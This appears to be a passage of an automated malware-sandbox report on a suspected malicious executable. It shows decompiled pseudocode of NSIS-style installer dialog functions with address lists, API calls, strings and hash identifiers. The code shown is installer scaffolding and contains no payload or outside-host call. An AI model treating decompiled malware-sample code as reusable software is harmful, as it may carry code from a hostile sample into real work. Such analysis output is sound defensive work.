											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fa0 = _a4;
					_t247 =  *0x423f6c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f6c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f6c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                0x004047f1
                0x004047f7
                0x004047f9
                0x004047ff
                0x00404805
                0x00404808
                0x00404812
                0x0040481b
                0x0040481e
                0x00404821
                0x00404a49
                0x00404a49
                0x00404a50
                0x00404a64
                0x00404a52
                0x00404a54
                0x00404a57
                0x00404a58
                0x00404a5f
                0x00404a5f
                0x00404a67
                0x00404a70
                0x00404a7b
                0x00404a7b
                0x00404a7e
                0x00404a81
                0x00404a90
                0x00404a90
                0x00404a97
                0x00404b0f
                0x00404b0f
                0x00404b12
                0x00404b14
                0x00404b17
                0x00404b1e
                0x00404b2c
                0x00404b2c
                0x00404b2e
                0x00404b31
                0x00404b38
                0x00404b3a
                0x00404b3e
                0x00404b5b
                0x00404b5f
                0x00404b5f
                0x00404b40
                0x00404b4d
                0x00404b4d
                0x00404b3e
                0x00404b38
                0x00000000
                0x00404b12
                0x00404a99
                0x00404a9c
                0x00404aa7
                0x00404aa9
                0x00404aac
                0x00404ab3
                0x00404ab8
                0x00404aba
                0x00404ac4
                0x00404ac4
                0x00404ac8
                0x00404aca
                0x00404acd
                0x00404acf
                0x00404ad2
                0x00404ae8
                0x00404ae8
                0x00404ad4
                0x00404ad4
                0x00404ada
                0x00404adc
                0x00404ae3
                0x00404ade
                0x00404ade
                0x00404ade
                0x00404adc
                0x00404aec
                0x00404aee
                0x00404af3
                0x00404afc
                0x00404afd
                0x00404b07
                0x00404b07
                0x00404b09
                0x00404b0c
                0x00404b0c
                0x00404acd
                0x00000000
                0x00404aba
                0x00404a9e
                0x00404aa1
                0x00404aa5
                0x00000000
                0x00000000
                0x00000000
                0x00404aa5
                0x00404a83
                0x00404a8a
                0x00000000
                0x00000000
                0x00000000
                0x00404a72
                0x00404a72
                0x00404a75
                0x00404b62
                0x00404b62
                0x00404b69
                0x00404bdd
                0x00404bdd
                0x00404be4
                0x00404bf0
                0x00404bf0
                0x00404bf2
                0x00404bf9
                0x00404bfb
                0x00404c00
                0x00404c02
                0x00404c05
                0x00404c05
                0x00404c0b
                0x00404c10
                0x00404c12
                0x00404c15
                0x00404c15
                0x00404c1b
                0x00404c21
                0x00404c27
                0x00404c27
                0x00404c2d
                0x00404c34
                0x00404d81
                0x00404d81
                0x00404d88
                0x00404d8a
                0x00404d91
                0x00404d95
                0x00404da2
                0x00404da2
                0x00404da5
                0x00404dab
                0x00404dbd
                0x00404dbd
                0x00404d91
                0x00000000
                0x00404c3a
                0x00404c3c
                0x00404c41
                0x00404c44
                0x00404c48
                0x00404c48
                0x00404c4d
                0x00404c50
                0x00404c91
                0x00404c93
                0x00404c9d
                0x00404ca3
                0x00404ca6
                0x00404cab
                0x00404cb2
                0x00404cb5
                0x00404d57
                0x00404d5d
                0x00404d63
                0x00404d68
                0x00404d6b
                0x00404d7c
                0x00404d7c
                0x00000000
                0x00404cbb
                0x00404cbb
                0x00404cbb
                0x00404cbe
                0x00404cc4
                0x00404cc7
                0x00404cc9
                0x00404ccb
                0x00404ccd
                0x00404cd0
                0x00404cd3
                0x00404cda
                0x00404cdc
                0x00404cdf
                0x00404ce6
                0x00404ce9
                0x00404ce9
                0x00404ce9
                0x00404ce9
                0x00404ced
                0x00404cf0
                0x00404cfc
                0x00404cfd
                0x00404d00
                0x00404d02
                0x00404d02
                0x00404d02
                0x00404cf2
                0x00404cf4
                0x00404cf4
                0x00404d21
                0x00404d21
                0x00404d22
                0x00404d2e
                0x00404d3d
                0x00404d3d
                0x00404d3f
                0x00404d42
                0x00404d4b
                0x00404d4b
                0x00000000
                0x00404cbe
                0x00404c52
                0x00404c5d
                0x00404c60
                0x00404c65
                0x00404c67
                0x00404c69
                0x00404c6b
                0x00404c7b
                0x00404c85
                0x00404c87
                0x00404c8a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404c6d
                0x00404c6d
                0x00404c6d
                0x00404c70
                0x00404c73
                0x00404c75
                0x00404c75
                0x00404c75
                0x00404c76
                0x00404c77
                0x00404c77
                0x00000000
                0x00404c6d
                0x00404c50
                0x00404c34
                0x00404b6b
                0x00404b71
                0x00000000
                0x00000000
                0x00404b7d
                0x00404b81
                0x00000000
                0x00000000
                0x00404b91
                0x00404b93
                0x00404b96
                0x00000000
                0x00000000
                0x00404ba8
                0x00404baa
                0x00404bad
                0x00404bb7
                0x00404bb9
                0x00404bba
                0x00404bbb
                0x00404bca
                0x00404bcc
                0x00404bd3
                0x00404bd6
                0x00000000
                0x00404bd6
                0x00404baf
                0x00404bb2
                0x00404bb5
                0x00000000
                0x00000000
                0x00000000
                0x00404bb5
                0x00000000
                0x00404a75
                0x00404827
                0x0040482c
                0x00404831
                0x00404836
                0x00404837
                0x00404840
                0x0040484b
                0x00404856
                0x0040485c
                0x0040486a
                0x0040487f
                0x00404884
                0x0040488f
                0x00404898
                0x004048ad
                0x004048be
                0x004048cb
                0x004048cb
                0x004048d0
                0x004048d6
                0x004048d8
                0x004048db
                0x004048e0
                0x004048e5
                0x004048e7
                0x004048e7
                0x00404907
                0x00404907
                0x00404909
                0x0040490a
                0x0040490f
                0x00404912
                0x00404915
                0x00404919
                0x0040491e
                0x00404923
                0x00404927
                0x0040492c
                0x00404931
                0x00404933
                0x00404935
                0x0040493b
                0x00404a05
                0x00404a18
                0x00000000
                0x00404941
                0x00404944
                0x00404947
                0x0040494a
                0x0040494a
                0x00404950
                0x00404956
                0x00404959
                0x0040495f
                0x00404960
                0x00404965
                0x0040496e
                0x00404975
                0x00404978
                0x0040497b
                0x0040497e
                0x004049b8
                0x004049ba
                0x004049e3
                0x004049bc
                0x004049c9
                0x004049c9
                0x00404980
                0x00404983
                0x00404992
                0x0040499c
                0x004049a4
                0x004049ab
                0x004049b3
                0x004049b3
                0x0040497e
                0x004049e9
                0x004049ea
                0x004049f0
                0x004049f6
                0x004049f6
                0x00404a03
                0x00404a1e
                0x00404a22
                0x00404a3f
                0x00404a44
                0x00404a47
                0x00404a47
                0x00000000
                0x00404a24
                0x00404a29
                0x00404a32
                0x00404dbf
                0x00404dd1
                0x00404dd1
                0x00404a22
                0x00000000
                0x00404a03
                0x0040493b

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 1638840714-813528018
                • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404292, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42371c; // 0x4e7cf3
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t124 =  *0x423f50; // 0x4e0f60
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                0x00404292
                0x00404298
                0x0040429e
                0x004042ab
                0x004042b9
                0x004042bc
                0x004042c4
                0x004042ca
                0x004042ca
                0x004042d6
                0x004042d9
                0x00404347
                0x0040434e
                0x00404425
                0x0040442c
                0x0040443b
                0x0040443b
                0x0040443f
                0x00404449
                0x00404456
                0x00404458
                0x00404458
                0x00404466
                0x0040446d
                0x00404474
                0x00404477
                0x004044ae
                0x004044b0
                0x004044b6
                0x004044bb
                0x004044bf
                0x004044c1
                0x004044c1
                0x004044dd
                0x00000000
                0x004044df
                0x004044e2
                0x004044f0
                0x004044f6
                0x004044f7
                0x004044fa
                0x004044fd
                0x00000000
                0x004044fd
                0x00404479
                0x0040447b
                0x0040447f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404481
                0x00404481
                0x0040448e
                0x00404493
                0x00000000
                0x00000000
                0x00404497
                0x00404499
                0x00404499
                0x004044a4
                0x004044a7
                0x004044ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004044ac
                0x00404509
                0x00404513
                0x00404516
                0x00404519
                0x00404520
                0x00404520
                0x00404522
                0x00404522
                0x00404527
                0x00404529
                0x00404531
                0x00404538
                0x0040453a
                0x00404545
                0x00404545
                0x0040453a
                0x0040454c
                0x00404555
                0x0040455f
                0x00404567
                0x00404582
                0x00404569
                0x00404572
                0x00404572
                0x00404567
                0x00404587
                0x0040458c
                0x00404591
                0x0040459a
                0x0040459a
                0x004045a3
                0x004045a5
                0x004045a5
                0x004045b1
                0x004045b9
                0x004045c3
                0x004045c3
                0x004045c8
                0x00000000
                0x004045c8
                0x00404477
                0x0040442e
                0x00404435
                0x00000000
                0x00000000
                0x00000000
                0x00404435
                0x00404354
                0x0040435d
                0x00404377
                0x0040437c
                0x00404386
                0x0040438d
                0x00404399
                0x0040439c
                0x0040439f
                0x004043a6
                0x004043ae
                0x004043b1
                0x004043b5
                0x004043bc
                0x004043c4
                0x0040441e
                0x004043c6
                0x004043c7
                0x004043ce
                0x004043d3
                0x004043d8
                0x004043e0
                0x004043ed
                0x00404401
                0x00404405
                0x00404405
                0x00404401
                0x0040440a
                0x00404417
                0x00404417
                0x004043c4
                0x00000000
                0x0040437c
                0x0040436a
                0x00000000
                0x00000000
                0x00404370
                0x00000000
                0x004042db
                0x004042e8
                0x004042f1
                0x004042fe
                0x004042fe
                0x00404305
                0x0040430b
                0x00404314
                0x00404317
                0x0040431a
                0x00404322
                0x00404325
                0x00404328
                0x0040432e
                0x00404335
                0x0040433c
                0x004045ce
                0x004045e0
                0x00404342
                0x00404345
                0x00000000
                0x00404345
                0x0040433c

                APIs
                • GetDlgItem.USER32 ref: 004042E1
                • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                • lstrcmpiA.KERNEL32(ymvwfuvwx,00420538,00000000,?,?), ref: 004043F9
                • lstrcatA.KERNEL32(?,ymvwfuvwx), ref: 00404405
                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                  • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                  • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E52
                  • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                  • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E64
                  • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E74
                • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                  • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                  • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                  • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                • String ID: A$C:\Users\user~1\AppData\Local\Temp$ymvwfuvwx
                • API String ID: 2624150263-965809636
                • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                0x0040205c
                0x00402066
                0x0040206f
                0x00402079
                0x00402082
                0x0040208c
                0x00402090
                0x00402090
                0x00402095
                0x004020a6
                0x004020ae
                0x0040218e
                0x0040218e
                0x00402195
                0x004020b4
                0x004020b4
                0x004020c5
                0x004020c9
                0x004020cf
                0x004020d9
                0x004020db
                0x004020e6
                0x004020e9
                0x004020f6
                0x004020f8
                0x004020fa
                0x00402101
                0x00402104
                0x00402104
                0x00402107
                0x00402111
                0x00402119
                0x0040211e
                0x0040212a
                0x0040212a
                0x0040212d
                0x00402136
                0x00402139
                0x00402142
                0x00402147
                0x00402159
                0x00402168
                0x0040216a
                0x00402176
                0x00402176
                0x00402168
                0x00402178
                0x0040217e
                0x0040217e
                0x00402181
                0x00402187
                0x0040218c
                0x004021a1
                0x00000000
                0x00000000
                0x00000000
                0x0040218c
                0x00402197
                0x004028c1
                0x004028cd

                APIs
                • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                Strings
                • C:\Users\user~1\AppData\Local\Temp, xrefs: 004020DE
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user~1\AppData\Local\Temp
                • API String ID: 123533781-3107243751
